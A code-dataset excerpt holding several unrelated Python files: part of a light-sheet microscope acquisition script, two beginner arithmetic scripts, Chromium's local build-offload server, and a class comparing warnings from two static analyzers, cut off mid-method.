gaussian_filter_std)\r\n                # Find background level and set threshold:\r\n                scan_threshold = int(min(scan_line) * signal_to_bg_ratio)\r\n                prop_threshold = int(min(prop_line) * signal_to_bg_ratio)\r\n                width_threshold = int(min(width_line) * signal_to_bg_ratio)\r\n                # Estimate roi:\r\n                min_index_zyx = [0, 0, 0]\r\n                max_index_zyx = [slices - 1, h_px - 1, w_px - 1]\r\n                for i in range(slices):\r\n                    if scan_line[i] > scan_threshold:\r\n                        min_index_zyx[0] = i\r\n                        break\r\n                for i in range(h_px - t_px - b_px):\r\n                    if prop_line[i] > prop_threshold:\r\n                        min_index_zyx[1] = i + t_px # put cropped pixels back\r\n                        break\r\n                for i in range(w_px):\r\n                    if width_line[i] > width_threshold:\r\n                        min_index_zyx[2] = i\r\n                        break\r\n
                # Scan back from the end for the max indices (note the\r\n                # reversed '-1 - i' indexing):\r\n                for i in range(slices):\r\n                    if scan_line[-1 - i] > scan_threshold:\r\n                        max_index_zyx[0] = max_index_zyx[0] - i\r\n                        break\r\n                for i in range(h_px - t_px - b_px):\r\n                    if prop_line[-1 - i] > prop_threshold:\r\n                        max_index_zyx[1] = max_index_zyx[1] - i - b_px\r\n                        break\r\n                for i in range(w_px):\r\n                    if width_line[-1 - i] > width_threshold:\r\n                        max_index_zyx[2] = max_index_zyx[2] - i\r\n                        break\r\n                min_index_ch.append(min_index_zyx)\r\n                max_index_ch.append(max_index_zyx)\r\n            min_index_vo.append(np.amin(min_index_ch, axis=0))\r\n            max_index_vo.append(np.amax(max_index_ch, axis=0))\r\n        min_i = np.amin(min_index_vo, axis=0)\r\n        max_i = np.amax(max_index_vo, axis=0)\r\n        data_roi = data[\r\n            :, min_i[0]:max_i[0], :, min_i[1]:max_i[1], min_i[2]:max_i[2]]\r\n        return data_roi # hopefully smaller!\r\n\r\nclass DataNative:\r\n    # The 'native view' is the most principled view of the data for analysis.\r\n    # If 'type(scan_step_size_px) is int' (default) then no interpolation is\r\n    # needed to view the volume. The native view looks at the sample with\r\n    # the 'tilt' of the Snouty objective (microscope 3 in the emission path).\r\n    def get(\r\n        self,\r\n        data, # raw 5D data, 'tzcyx' input -> 'tzcyx' output\r\n        scan_step_size_px):\r\n        vo, slices, ch, h_px, w_px = data.shape\r\n        prop_px = h_px # light-sheet propagation axis\r\n        scan_step_px_max = int(np.rint(scan_step_size_px * (slices - 1)))\r\n        data_native = np.zeros(\r\n            (vo, slices, ch, prop_px + scan_step_px_max, w_px), 'uint16')\r\n        for v in range(vo):\r\n            for c in range(ch):\r\n                for i in range(slices):\r\n                    prop_px_shear = int(np.rint(i * scan_step_size_px))\r\n                    data_native[\r\n                        v, i, c, prop_px_shear:prop_px + prop_px_shear, :] = (\r\n                            data[v, i, c, :, :])\r\n        return data_native # larger!\r\n\r\nclass DataTraditional:\r\n    # Very slow but pleasing - rotates the native view to the traditional view!\r\n    def get(\r\n        self,\r\n        data_native, # raw 5D data, 'tzcyx' input -> 'tzcyx' output\r\n        scan_step_size_px):\r\n        vo, slices, ch, h_px, w_px = data_native.shape\r\n        voxel_aspect_ratio = calculate_voxel_aspect_ratio(scan_step_size_px)\r\n        tzcyx = []\r\n        for v in range(vo):\r\n            zcyx = []\r\n            for c in range(ch):\r\n                zyx_native_cubic_voxels = zoom(\r\n                    data_native[v, :, c, :, :], (voxel_aspect_ratio, 1, 1))\r\n                zyx_traditional = rotate(\r\n                    zyx_native_cubic_voxels, np.rad2deg(tilt))\r\n                zcyx.append(zyx_traditional[:, np.newaxis, :, :])\r\n            zcyx = np.concatenate(zcyx, axis=1)\r\n            tzcyx.append(zcyx[np.newaxis, :, :, :, :])\r\n        data_traditional = np.concatenate(tzcyx, axis=0)\r\n        return data_traditional # even larger!\r\n\r\n
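# Example (hypothetical, so kept commented out): chaining the classes above\r\n# to post-process a saved acquisition. The filename is a placeholder and\r\n# 'scan_step_size_px' must match the value recorded in the metadata:\r\n##  data = imread('000000.tif') # 5D 'tzcyx' raw data\r\n##  data = DataRoi().get(data, preview_crop_px=3,\r\n##                       timestamp_mode=\"binary+ASCII\")\r\n##  native = DataNative().get(data, scan_step_size_px=2)\r\n##  traditional = DataTraditional().get(native, scan_step_size_px=2)\r\n##  imwrite('traditional.tif', traditional, imagej=True)\r\n\r\n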
if __name__ == '__main__':\r\n    t0 = time.perf_counter()\r\n\r\n    # Create scope object:\r\n    scope = Microscope(max_allocated_bytes=100e9, ao_rate=1e4)\r\n    scope.apply_settings( # Mandatory call\r\n        channels_per_slice=(\"LED\", \"488\"),\r\n        power_per_channel=(50, 10),\r\n        filter_wheel_position=3,\r\n        illumination_time_us=100,\r\n        height_px=248,\r\n        width_px=1060,\r\n        voxel_aspect_ratio=2,\r\n        scan_range_um=50,\r\n        volumes_per_buffer=1,\r\n        focus_piezo_z_um=(0,'relative'),\r\n        XY_stage_position_mm=(0,0,'relative'),\r\n        ).join()\r\n\r\n    # Run snoutfocus and acquire:\r\n    folder_label = 'sols_test_data'\r\n    dt = datetime.strftime(datetime.now(),'%Y-%m-%d_%H-%M-%S_000_')\r\n    folder_name = dt + folder_label\r\n    scope.snoutfocus(filename='snoutfocus.tif')\r\n    for i in range(3):\r\n        scope.acquire(\r\n            filename='%06i.tif'%i,\r\n            folder_name=folder_name,\r\n            description='something...',\r\n            delay_s=0,\r\n            display=True,\r\n            )\r\n    scope.close()\r\n\r\n    t1 = time.perf_counter()\r\n    print('time_s', t1 - t0) # ~ 9.5s\r\n","sub_path":"figures/data/air_objective/beads/ht_sols_microscope.py","file_name":"ht_sols_microscope.py","file_ext":"py","file_size_in_byte":50696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"348093151","text":"#A Python example that calculates the raised salary of a worker from a given salary and raise rate, and prints it on screen:\r\n\r\n\r\ndef hesap(maas,zam):\r\n    yenimaas=(maas+(maas*(zam/100)))\r\n    print(\"New raised salary:\",yenimaas)\r\n\r\nmaas=int(input(\"Enter your normal salary..\"))\r\nzam=int(input(\"Enter the raise rate...\"))\r\nhesap(maas,zam)\r\n\r\n\r\n#\r\n","sub_path":"zamlımaas.py","file_name":"zamlımaas.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"462652864","text":"#!/usr/bin/python\n#coding:utf-8\nimport sys\nprint(\"Enter a natural number and I will compute the sum of its first n terms\")\nn=int(input(\"N=\"))\ni=1\ns=0\nwhile i<=n:\n    s+=i\n    i+=1\nprint(\"1+2+...+\"+str(n)+\"=\"+str(s))\n","sub_path":"For/For.py","file_name":"For.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"251230172","text":"#!/usr/bin/env python3\n# Copyright 2021 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\"\"\"Creates a server to offload non-critical-path GN targets.\"\"\"\n\nimport argparse\nimport dataclasses\nimport json\nimport os\nimport shutil\nimport socket\nimport subprocess\nimport sys\nimport threading\nfrom typing import Dict, List, Optional, Tuple\n\nsys.path.append(os.path.join(os.path.dirname(__file__), 'gyp'))\nfrom util import server_utils\n\n\nclass Logger:\n  \"\"\"Class to store global state for logging.\"\"\"\n  num_processes: int = 0\n  completed_tasks: int = 0\n  total_tasks: int = 0\n\n  @classmethod\n  def _plural(cls, word: str, num: int, suffix: str = 's'):\n    if num == 1:\n      return word\n    return word + suffix\n\n  @classmethod\n  def _prefix(cls):\n    # Ninja's prefix is: [205 processes, 6/734 @ 6.5/s : 0.922s ]\n    # Time taken and task completion rate are not important for the build server\n    # since it is always running in the background and uses idle priority for\n    # its tasks.\n    processes_str = cls._plural('process', cls.num_processes, suffix='es')\n    return (f'{cls.num_processes} {processes_str}, '\n            f'{cls.completed_tasks}/{cls.total_tasks}')\n\n  @classmethod\n  def log(cls, msg: str, *, end: str = ''):\n    # Shrink the message (leaving a 2-char prefix and use the rest of the room\n    # for the suffix) according to terminal size so it is always one line.\n    width = shutil.get_terminal_size().columns\n    prefix = f'[{cls._prefix()}] '\n    max_msg_width = width - len(prefix)\n    if len(msg) > max_msg_width:\n      length_to_show = max_msg_width - 5  # Account for ellipsis and header.\n      msg = f'{msg[:2]}...{msg[-length_to_show:]}'\n    # \\r to return the carriage to the beginning of line.\n    # \\033[K to replace the normal \\n to erase until the end of the line.\n    # Avoid the default line ending so the next \\r overwrites the same line just\n    # like ninja's output.\n    print(f'\\r{prefix}{msg}\\033[K', end=end, flush=True)\n\n\n@dataclasses.dataclass\nclass Task:\n  \"\"\"Class to represent a single build task.\"\"\"\n  name: str\n  cwd: str\n  cmd: List[str]\n  stamp_file: str\n  _proc: Optional[subprocess.Popen] = None\n  _thread: Optional[threading.Thread] = None\n
  _terminated: bool = False\n  _return_code: Optional[int] = None\n\n  @property\n  def key(self):\n    return (self.cwd, self.name)\n\n  def start(self):\n    assert self._proc is None\n    Logger.num_processes += 1\n    Logger.log(f'STARTING {self.name}')\n    # The environment variable forces the script to actually run in order to\n    # avoid infinite recursion.\n    env = os.environ.copy()\n    env[server_utils.BUILD_SERVER_ENV_VARIABLE] = '1'\n    # Use os.nice(19) to ensure the lowest priority (idle) for these analysis\n    # tasks since we want to avoid slowing down the actual build.\n    # TODO(wnwen): Also use ionice to reduce resource consumption. Possibly use\n    #              cgroups to make these processes use even fewer resources than\n    #              idle priority.\n    self._proc = subprocess.Popen(\n        self.cmd,\n        stdout=subprocess.PIPE,\n        stderr=subprocess.STDOUT,\n        cwd=self.cwd,\n        env=env,\n        text=True,\n        preexec_fn=lambda: os.nice(19),\n    )\n    # Avoid daemon=True to allow threads to finish running cleanup on Ctrl-C.\n    self._thread = threading.Thread(target=self._complete_when_process_finishes)\n    self._thread.start()\n\n  def terminate(self):\n    if self._terminated:\n      return\n    self._terminated = True\n    if self._proc:\n      self._proc.terminate()\n      self._proc.wait()\n    if self._thread:\n      self._thread.join()\n\n  def _complete_when_process_finishes(self):\n    assert self._proc\n    # We know Popen.communicate will return a str and not a byte since it is\n    # constructed with text=True.\n    stdout: str = self._proc.communicate()[0]\n    self._return_code = self._proc.returncode\n    self._proc = None\n    self._complete(stdout)\n\n  def _complete(self, stdout: str):\n    assert self._proc is None\n    Logger.completed_tasks += 1\n    Logger.num_processes -= 1\n    failed = False\n    if self._terminated:\n      Logger.log(f'TERMINATED {self.name}')\n      # Ignore stdout as it is now outdated.\n      failed = True\n    else:\n      Logger.log(f'FINISHED {self.name}')\n      if stdout or self._return_code != 0:\n        failed = True\n        # An extra new line is needed since Logger.log does not end with a new\n        # line.\n        print(f'\\nFAILED: {self.name} Return code: {self._return_code}')\n        print(' '.join(self.cmd))\n        print(stdout)\n\n    if failed:\n      # Force ninja to consider failed targets as dirty.\n      try:\n        os.unlink(os.path.join(self.cwd, self.stamp_file))\n      except FileNotFoundError:\n        pass\n    else:\n      # Ninja will rebuild targets when their inputs change even if their stamp\n      # file has a later modified time. 
Thus we do not need to worry about the\n # script being run by the build server updating the mtime incorrectly.\n pass\n\n\ndef _listen_for_request_data(sock: socket.socket):\n while True:\n conn = sock.accept()[0]\n received = []\n with conn:\n while True:\n data = conn.recv(4096)\n if not data:\n break\n received.append(data)\n if received:\n yield json.loads(b''.join(received))\n\n\ndef _process_requests(sock: socket.socket):\n # Since dicts in python can contain anything, explicitly type tasks to help\n # make static type checking more useful.\n tasks: Dict[Tuple[str, str], Task] = {}\n try:\n for data in _listen_for_request_data(sock):\n task = Task(name=data['name'],\n cwd=data['cwd'],\n cmd=data['cmd'],\n stamp_file=data['stamp_file'])\n Logger.total_tasks += 1\n existing_task = tasks.get(task.key)\n if existing_task:\n existing_task.terminate()\n tasks[task.key] = task\n # TODO(wnwen): Rather than start it right away, add this task to a running\n # queue and run either a limited number of processes (10) or\n # even just 1 until the server load is very low (or ninja has\n # finished).\n task.start()\n except KeyboardInterrupt:\n Logger.log('STOPPING SERVER...', end='\\n')\n # Gracefully exit by terminating all running tasks and allowing their io\n # watcher threads to finish and run cleanup on their own.\n for task in tasks.values():\n task.terminate()\n Logger.log('STOPPED', end='\\n')\n\n\ndef main():\n parser = argparse.ArgumentParser(description=__doc__)\n parser.parse_args()\n with socket.socket(socket.AF_UNIX) as sock:\n sock.bind(server_utils.SOCKET_ADDRESS)\n sock.listen()\n _process_requests(sock)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"build/android/fast_local_dev_server.py","file_name":"fast_local_dev_server.py","file_ext":"py","file_size_in_byte":6813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"331799772","text":"import numpy as np\nimport copy\nimport clang\nimport clang.cindex\n\n# Internal imports\nfrom projectLib.Common import srch_list_ind, save_list, load_list, print_numpy\nfrom projectLib.Classes.AnalyzerInfo import AnalyzerInfo\nfrom projectLib.ProjectConfig import type_groups\nfrom projectLib.Classes.FileInfo import FileInfo\nfrom projectLib.Classes.ErrorInfo import ErrorInfo\n\n\nclass Comparison:\n\n def __init__(self,\n analyzer1_info: AnalyzerInfo=AnalyzerInfo(),\n analyzer2_info: AnalyzerInfo=AnalyzerInfo()):\n\n self.name_catalog_an1 = []\n self.name_catalog_an2 = []\n self.stat_matrix = None\n\n self.analyzer1_info = copy.deepcopy(analyzer1_info)\n self.analyzer2_info = copy.deepcopy(analyzer2_info)\n\n def check_both_FileInfo_format(self):\n if self.analyzer1_info.info_type != \"FileInfo\" or \\\n self.analyzer2_info.info_type != \"FileInfo\":\n print(\"GROUP COMPARISON ONLY SUPPORTED FOR FileInfo info_type\")\n return False\n return True\n\n def get_errors_only_in_analyzer_num(self, analyzer_num: int):\n if not self.check_both_FileInfo_format():\n return -1\n\n if analyzer_num == 1:\n analyzer_info = self.analyzer1_info\n else:\n if analyzer_num == 2:\n analyzer_info = self.analyzer2_info\n else:\n print(\"NO SUCH ANALYZER_NUM\")\n return -1\n\n result_analyzer_info = AnalyzerInfo(analyzer_name=analyzer_info.analyzer_name,\n info_type=analyzer_info.info_type)\n\n # FileInfo actions BEGIN\n for file_info in analyzer_info.info:\n file_to_add = FileInfo(file=file_info.file)\n for error_info in file_info.errors:\n if not error_info.has_bindings():\n 
file_to_add.append(error_info)\n            if file_to_add.has_errors():\n                result_analyzer_info.append(file_to_add)\n\n        # FileInfo actions END\n        return result_analyzer_info\n\n    def get_errors_in_all_analyzers(self):\n        if not self.check_both_FileInfo_format():\n            return -1\n\n        result_analyzer_info = AnalyzerInfo(analyzer_name=\"COMBINED\",\n                                            info_type=self.analyzer1_info.info_type)\n\n        # FileInfo actions BEGIN\n\n        for file_info_an1 in self.analyzer1_info.info:\n            for error_info_an1 in file_info_an1:\n                for binding in error_info_an1.bindings:\n                    filename_to_search = file_info_an1.file\n                    if binding.file:\n                        filename_to_search = binding.file\n                    file_info_an2 = self.analyzer2_info.search_by_file(filename_to_search)\n                    error_info_an2 = file_info_an2[binding.ind]\n                    result_analyzer_info.append(\n                        [ErrorInfo(\n                            file=file_info_an1.file,\n                            lines=error_info_an1.lines,\n                            type=error_info_an1.type),\n                         ErrorInfo(\n                            file=binding.file,\n                            lines=error_info_an2.lines,\n                            type=error_info_an2.type\n                        )])\n\n        # FileInfo actions END\n        return result_analyzer_info\n\n    def comparison_copy(self, orig):\n        self.name_catalog_an1 = copy.deepcopy(orig.name_catalog_an1)\n        self.name_catalog_an2 = copy.deepcopy(orig.name_catalog_an2)\n        self.stat_matrix = copy.deepcopy(orig.stat_matrix)\n\n        self.analyzer1_info = copy.deepcopy(orig.analyzer1_info)\n        self.analyzer2_info = copy.deepcopy(orig.analyzer2_info)\n\n    def save_comparison(self, res_dir, comparison_id):\n\n        name_catalog_an1_path = res_dir + \"/cmp_name_catalog_an1_ind\" + str(comparison_id) + \".data\"\n        name_catalog_an2_path = res_dir + \"/cmp_name_catalog_an2_ind\" + str(comparison_id) + \".data\"\n        stat_matrix_path = res_dir + \"/cmp_stat_matrix\" + str(comparison_id) + \".npy\"\n        analyzer1_info_path = res_dir + \"/analyzer1_info\"\n        analyzer2_info_path = res_dir + \"/analyzer2_info\"\n\n        save_list(self.name_catalog_an1, name_catalog_an1_path)\n        save_list(self.name_catalog_an2, name_catalog_an2_path)\n        np.save(stat_matrix_path, self.stat_matrix)\n        self.analyzer1_info.save_info(analyzer1_info_path, comparison_id)\n        self.analyzer2_info.save_info(analyzer2_info_path, comparison_id)\n\n        return 0\n\n    def load_comparison(self, res_dir, comparison_id):\n\n        name_catalog_an1_path = res_dir + \"/cmp_name_catalog_an1_ind\" + str(comparison_id) + \".data\"\n        name_catalog_an2_path = res_dir + \"/cmp_name_catalog_an2_ind\" + str(comparison_id) + \".data\"\n        stat_matrix_path = res_dir + \"/cmp_stat_matrix\" + str(comparison_id) + \".npy\"\n        analyzer1_info_path = res_dir + \"/analyzer1_info\"\n        analyzer2_info_path = res_dir + \"/analyzer2_info\"\n\n        self.name_catalog_an1 = load_list(name_catalog_an1_path)\n        self.name_catalog_an2 = load_list(name_catalog_an2_path)\n        self.stat_matrix = np.load(stat_matrix_path)\n        self.analyzer1_info.load_info(analyzer1_info_path, comparison_id)\n        self.analyzer2_info.load_info(analyzer2_info_path, comparison_id)\n\n        return 0\n\n    def group_comparison(self, an1_type_groups, an2_type_groups):\n        if not self.check_both_FileInfo_format():\n            return -1\n\n        result_comparison = Comparison(copy.deepcopy(self.analyzer1_info),\n                                       copy.deepcopy(self.analyzer2_info))\n\n        result_comparison.stat_matrix = np.zeros((self.stat_matrix.shape[0] - an1_type_groups[\"TOTAL_COMPRESSION\"],\n                                                  self.stat_matrix.shape[1] - an2_type_groups[\"TOTAL_COMPRESSION\"]),\n                                                 dtype=int)\n\n        name_catalog_an1_dict = []\n        name_catalog_an1_initial = []\n\n        for el_ind in range(len(self.name_catalog_an1)):\n            name_catalog_an1_initial.append([self.name_catalog_an1[el_ind], [el_ind]])\n\n        for dict_name in an1_type_groups:\n            if 
dict_name == \"TOTAL_COMPRESSION\":\n continue\n dict_name_column_list = []\n for catalog_name_ind in range(len(self.name_catalog_an1)):\n if self.name_catalog_an1[catalog_name_ind] in an1_type_groups[dict_name]:\n dict_name_column_list.append(catalog_name_ind)\n name_catalog_an1_initial.remove([self.name_catalog_an1[catalog_name_ind], [catalog_name_ind]])\n name_catalog_an1_dict.append([dict_name, dict_name_column_list])\n\n name_catalog_an2_dict = []\n name_catalog_an2_initial = []\n\n for el_ind in range(len(self.name_catalog_an2)):\n name_catalog_an2_initial.append([self.name_catalog_an2[el_ind], [el_ind]])\n\n for dict_name in an2_type_groups:\n if dict_name == \"TOTAL_COMPRESSION\":\n continue\n dict_name_column_list = []\n for catalog_name_ind in range(len(self.name_catalog_an2)):\n if self.name_catalog_an2[catalog_name_ind] in an2_type_groups[dict_name]:\n dict_name_column_list.append(catalog_name_ind)\n name_catalog_an2_initial.remove(\n [self.name_catalog_an2[catalog_name_ind], [catalog_name_ind]])\n name_catalog_an2_dict.append([dict_name, dict_name_column_list])\n\n name_catalog_an1_merged = name_catalog_an1_dict + name_catalog_an1_initial\n name_catalog_an2_merged = name_catalog_an2_dict + name_catalog_an2_initial\n\n for an1_ind in range(len(name_catalog_an1_merged)):\n for an2_ind in range(len(name_catalog_an2_merged)):\n for stat_matrix_ind_line in name_catalog_an1_merged[an1_ind][1]:\n for stat_matrix_ind_column in name_catalog_an2_merged[an2_ind][1]:\n result_comparison.stat_matrix[an1_ind][an2_ind] += \\\n self.stat_matrix[stat_matrix_ind_line][stat_matrix_ind_column]\n\n result_comparison.name_catalog_an1 = [name[0] for name in name_catalog_an1_merged]\n result_comparison.name_catalog_an2 = [name[0] for name in name_catalog_an2_merged]\n\n # FileInfo actions BEGIN\n for file_an1 in self.analyzer1_info.info:\n file_to_attach = FileInfo(file=file_an1.file)\n for er_in_file_an1 in file_an1:\n ind = srch_list_ind(self.name_catalog_an1, er_in_file_an1.type)\n for name_merged_ind in range(len(name_catalog_an1_merged)):\n if ind in name_catalog_an1_merged[name_merged_ind][1]:\n file_to_attach.errors.append(ErrorInfo(lines=er_in_file_an1.lines,\n type=name_catalog_an1_merged[name_merged_ind][0],\n bindings=er_in_file_an1.bindings))\n break\n\n for file_an2 in self.analyzer2_info.info:\n file_to_attach = FileInfo(file=file_an2.file)\n for er_in_file_an2 in file_an2:\n ind = srch_list_ind(self.name_catalog_an2, er_in_file_an2.type)\n for name_merged_ind in range(len(name_catalog_an2_merged)):\n if ind in name_catalog_an2_merged[name_merged_ind][1]:\n file_to_attach.errors.append(ErrorInfo(lines=er_in_file_an2.lines,\n type=name_catalog_an2_merged[name_merged_ind][0],\n bindings=er_in_file_an2.bindings))\n break\n # FileInfo actions END\n return result_comparison\n\n def print_comparison(self, mode=\"stat\"):\n if not self.check_both_FileInfo_format():\n return -1\n\n if mode == \"stat\":\n print_numpy(self.stat_matrix, self.name_catalog_an1, self.name_catalog_an2)\n return 0\n # FileInfo actions BEGIN\n if mode == \"an1\":\n only_analyzer1_errors = self.get_errors_only_in_analyzer_num(1)\n for file_info in only_analyzer1_errors.info:\n print(file_info)\n\n for error_info in file_info:\n print(error_info)\n return 0\n\n if mode == \"an2\":\n only_analyzer2_errors = self.get_errors_only_in_analyzer_num(2)\n for file_info in only_analyzer2_errors.info:\n print(file_info)\n\n for error_info in file_info:\n print(error_info)\n return 0\n\n if mode == \"an_both\":\n 
both_analyzers_errors = self.get_errors_in_all_analyzers()\n ind = 0\n for binding in both_analyzers_errors.info:\n print(\"binding number: {}\".format(ind))\n ind += 1\n print(binding[0])\n print(binding[1])\n return 0\n # FileInfo actions END\n print(\"NO SUCH MODE\")\n return -1\n\n def stat_matrix_fill_by_bindings(self):\n for file_info_an1 in self.analyzer1_info.info:\n for error_info_an1 in file_info_an1:\n\n name_catalog1_ind = srch_list_ind(self.name_catalog_an1, error_info_an1.type)\n self.stat_matrix[name_catalog1_ind, -1] += 1\n\n if not error_info_an1.has_bindings():\n self.stat_matrix[name_catalog1_ind, -2] += 1\n\n for binding in error_info_an1.bindings:\n filename_to_search = file_info_an1.file\n if binding.file:\n filename_to_search = binding.file\n file_info_an2 = self.analyzer2_info.search_by_file(filename_to_search)\n error_info_an2 = file_info_an2[binding.ind]\n\n name_catalog2_ind = srch_list_ind(self.name_catalog_an2, error_info_an2.type)\n\n self.stat_matrix[name_catalog1_ind, name_catalog2_ind] += 1\n\n for file_info_an2 in self.analyzer2_info.info:\n for error_info_an2 in file_info_an2:\n\n name_catalog2_ind = srch_list_ind(self.name_catalog_an2, error_info_an2.type)\n self.stat_matrix[-1, name_catalog2_ind] += 1\n\n if not error_info_an2.has_bindings():\n self.stat_matrix[-2, name_catalog2_ind] += 1\n\n def __subproc_fill_for_set_operations(self):\n result_comparison = Comparison()\n result_comparison.name_catalog_an1 = copy.deepcopy(self.name_catalog_an1)\n result_comparison.name_catalog_an2 = copy.deepcopy(self.name_catalog_an2)\n\n result_comparison.stat_matrix = np.zeros(self.stat_matrix.shape, dtype='int')\n\n result_comparison.analyzer1_info = AnalyzerInfo(analyzer_name=self.analyzer1_info.analyzer_name,\n info_type=self.analyzer1_info.info_type)\n result_comparison.analyzer2_info = AnalyzerInfo(analyzer_name=self.analyzer2_info.analyzer_name,\n info_type=self.analyzer2_info.info_type)\n\n return result_comparison\n\n def __subproc_comparison_union_form_info(self, another_comparison, result_comparison, analyzer_num):\n if analyzer_num == 1:\n self_analyzer_info = self.analyzer1_info\n another_comparison_analyzer_info = another_comparison.analyzer1_info\n else:\n self_analyzer_info = self.analyzer2_info\n another_comparison_analyzer_info = another_comparison.analyzer2_info\n\n for file_info_cmp1 in self_analyzer_info.info:\n file_info_to_add = FileInfo(file=file_info_cmp1.file)\n file_info_cmp2 = another_comparison_analyzer_info.search_by_file(file_info_cmp1.file)\n for error_info_ind in range(len(file_info_cmp1.errors)):\n bindings_to_add = copy.deepcopy(file_info_cmp1.errors[error_info_ind].bindings)\n for binding_cmp2 in file_info_cmp2.errors[error_info_ind].bindings:\n if binding_cmp2 not in bindings_to_add:\n bindings_to_add.append(binding_cmp2)\n file_info_to_add.append(ErrorInfo(lines=file_info_cmp1.errors[error_info_ind].lines,\n type=file_info_cmp1.errors[error_info_ind].type,\n bindings=bindings_to_add))\n if analyzer_num == 1:\n # print(file_info_to_add)\n # for el in file_info_to_add:\n # print(el)\n result_comparison.analyzer1_info.append(file_info_to_add)\n else:\n result_comparison.analyzer2_info.append(file_info_to_add)\n return 0\n\n def comparison_union(self, another_comparison):\n\n if not self.check_both_FileInfo_format():\n return -1\n\n result_comparison = self.__subproc_fill_for_set_operations()\n\n # FileInfo actions BEGIN\n\n self.__subproc_comparison_union_form_info(another_comparison, result_comparison, analyzer_num=1)\n 
self.__subproc_comparison_union_form_info(another_comparison, result_comparison, analyzer_num=2)\n\n result_comparison.stat_matrix_fill_by_bindings()\n # FileInfo actions END\n\n return result_comparison\n\n def __same_error_extract_both(self, current_error_ind):\n result_list_an1 = []\n result_list_an2 = []\n current_error = self.error_list_both[current_error_ind]\n for error_ind in range(current_error_ind + 1, len(self.error_list_both)):\n error = self.error_list_both[error_ind]\n if current_error[0] != error[0]:\n break\n\n if current_error[1] == error[1] and \\\n current_error[3] == error[3]:\n result_list_an1.append([error[2], error[4]])\n\n if current_error[2] == error[2] and \\\n current_error[4] == error[4]:\n result_list_an2.append([error[1], error[3]])\n return result_list_an1, result_list_an2\n\n def __subproc_comparison_substraction_form_info(self, another_comparison, result_comparison, analyzer_num):\n if analyzer_num == 1:\n self_analyzer_info = self.analyzer1_info\n another_comparison_analyzer_info = another_comparison.analyzer1_info\n else:\n self_analyzer_info = self.analyzer2_info\n another_comparison_analyzer_info = another_comparison.analyzer2_info\n\n for file_info_cmp1 in self_analyzer_info.info:\n file_info_to_add = FileInfo(file=file_info_cmp1.file)\n file_info_cmp2 = another_comparison_analyzer_info.search_by_file(file_info_cmp1.file)\n for error_info_ind in range(len(file_info_cmp1.errors)):\n bindings_to_add = []\n for binding_cmp1 in file_info_cmp1[error_info_ind].bindings:\n if binding_cmp1 not in file_info_cmp2[error_info_ind].bindings:\n bindings_to_add.append(binding_cmp1)\n file_info_to_add.append(ErrorInfo(lines=file_info_cmp1[error_info_ind].lines,\n type=file_info_cmp1[error_info_ind].type,\n bindings=bindings_to_add))\n\n if analyzer_num == 1:\n result_comparison.analyzer1_info.append(file_info_to_add)\n else:\n result_comparison.analyzer2_info.append(file_info_to_add)\n\n def comparison_substraction(self, another_comparison):\n if not self.check_both_FileInfo_format():\n return -1\n\n result_comparison = self.__subproc_fill_for_set_operations()\n\n # FileInfo actions BEGIN\n self.__subproc_comparison_substraction_form_info(another_comparison, result_comparison, analyzer_num=1)\n self.__subproc_comparison_substraction_form_info(another_comparison, result_comparison, analyzer_num=2)\n\n result_comparison.stat_matrix_fill_by_bindings()\n # FileInfo actions END\n\n return result_comparison\n\n def __subproc_comparison_intersection_form_info(self, another_comparison, result_comparison, analyzer_num):\n if analyzer_num == 1:\n self_analyzer_info = self.analyzer1_info\n another_comparison_analyzer_info = another_comparison.analyzer1_info\n else:\n self_analyzer_info = self.analyzer2_info\n another_comparison_analyzer_info = another_comparison.analyzer2_info\n\n for file_info_cmp1 in self_analyzer_info.info:\n file_info_to_add = FileInfo(file=file_info_cmp1.file)\n file_info_cmp2 = another_comparison_analyzer_info.search_by_file(file_info_cmp1.file)\n for error_info_ind in range(len(file_info_cmp1.errors)):\n bindings_to_add = []\n for binding_cmp1 in file_info_cmp1[error_info_ind].bindings:\n if binding_cmp1 in file_info_cmp2[error_info_ind].bindings:\n bindings_to_add.append(binding_cmp1)\n file_info_to_add.append(ErrorInfo(lines=file_info_cmp1.errors[error_info_ind].lines,\n type=file_info_cmp1.errors[error_info_ind].type,\n bindings=bindings_to_add))\n if analyzer_num == 1:\n result_comparison.analyzer1_info.append(file_info_to_add)\n else:\n 
result_comparison.analyzer2_info.append(file_info_to_add)\n return 0\n\n def comparison_intersection(self, another_comparison):\n if not self.check_both_FileInfo_format():\n return -1\n\n result_comparison = self.__subproc_fill_for_set_operations()\n\n # FileInfo actions BEGIN\n self.__subproc_comparison_intersection_form_info(another_comparison, result_comparison, analyzer_num=1)\n self.__subproc_comparison_intersection_form_info(another_comparison, result_comparison, analyzer_num=2)\n\n result_comparison.stat_matrix_fill_by_bindings()\n # FileInfo actions END\n\n return result_comparison\n\n def heur_fill_for_heuristics(self, analyzer1_info: AnalyzerInfo, analyzer2_info: AnalyzerInfo):\n\n self.name_catalog_an1 = [warn[0] for warn in analyzer1_info.count_warnings()]\n self.name_catalog_an2 = [warn[0] for warn in analyzer2_info.count_warnings()]\n\n self.name_catalog_an1.append(\"ONLY_IN_ANALYZER2\")\n self.name_catalog_an1.append(\"TOTAL_AMOUNT_AN2\")\n\n self.name_catalog_an2.append(\"ONLY_IN_ANALYZER1\")\n self.name_catalog_an2.append(\"TOTAL_AMOUNT_AN1\")\n\n self.stat_matrix = np.zeros((len(self.name_catalog_an1), len(self.name_catalog_an2)), dtype=\"int\")\n self.stat_matrix[-1][-1] = -1\n self.stat_matrix[-1][-2] = -1\n self.stat_matrix[-2][-1] = -1\n self.stat_matrix[-2][-2] = -1\n\n self.analyzer1_info = copy.deepcopy(analyzer1_info)\n self.analyzer2_info = copy.deepcopy(analyzer2_info)\n\n return 0\n\n def search_entities_in_lines(self, node: clang.cindex.Cursor, found_lines: list, result_set: set):\n #dump_ast(node)\n if node.kind == clang.cindex.CursorKind.VAR_DECL or \\\n node.kind == clang.cindex.CursorKind.DECL_REF_EXPR:\n if node.location.line in found_lines:\n result_set.add(str(node.displayname))\n for c in node.get_children():\n 